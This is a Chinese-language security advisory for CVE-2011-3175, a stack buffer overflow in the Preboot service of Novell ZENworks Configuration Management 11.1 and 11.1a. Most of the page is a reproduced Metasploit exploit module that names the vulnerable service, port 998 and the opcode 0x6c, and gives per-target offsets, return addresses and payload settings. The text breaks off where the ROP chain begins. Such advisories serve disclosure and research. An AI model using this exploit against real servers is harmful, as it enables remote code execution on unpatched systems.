发布日期:2012-03-21
更新日期:2012-07-23
受影响系统:
Novell ZENworks Configuration Management 11.1A
Novell ZENworks Configuration Management 11.1
不受影响系统:
Novell ZENworks Configuration Management 11.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52659
CVE ID: CVE-2011-3175
Novell ZENworks Configuration Management是ZENworks系统网关工具中的配置管理解决方案。
Novell ZENworks Configuration Management (ZCM) 11.1和11.1a的Preboot服务中存在栈缓冲区溢出漏洞,通过操作码0x6c请求,可允许远程攻击者执行任意代码。
<*来源:Luigi Auriemma (aluigi@pivx.com)
链接:
?id=7010044
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Luigi Auriemma (aluigi@pivx.com)提供了如下测试方法:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow',
'Description' => %q{
This module exploits a remote buffer overflow in the ZENworks Configuration
Management. The vulnerability exists in the Preboot service and can be triggered by
sending a specially crafted packet with the opcode 0x6c (PROXY_CMD_GET_NEXT_STEP)
to port 998/TCP. The module has been successfully tested on Novell ZENworks
Configuration Management 10 SP2 / SP3 and Windows Server 2003 SP2 (DEP bypass).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', # Vulnerability Discovery
'juan' # Metasploit module
],
'References' =>
[
[ 'CVE', '2011-3175' ],
[ 'OSVDB', '80231' ],
[ 'BID', '52659' ],
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=973' ],
[ 'URL', 'http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5127930.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'BadChars' => "\x00",
'Space'=> 990,
'DisableNops' => true,
'PrependEncoder' => "\x81\xC4\x54\xF2\xFF\xFF" # add esp, -3500
},
'Platform' => ['win'],
'Targets' =>
[
[ 'Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2',
{
'Offset' => 1100,
'OffsetBottomStack' => 1148,
'OffsetRop' => 4,
'Ret' => 0x10024b8c # add esp, 1204 # ret from zenimgweb.dll
}
],
[ 'Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2',
{
'Offset' => 1100,
'OffsetBottomStack' => 1148,
'OffsetRop' => 4,
'Ret' => 0x10024a7c # add esp, 1204 # ret from zenimgweb.dll
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Feb 22 2012',
'DefaultTarget' => 0))
register_options([Opt::RPORT(998)], self.class)
end
def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end
def nop
return make_nops(4).unpack("L")[0].to_i
end
# rop chain generated with mona.py
def create_rop_chain()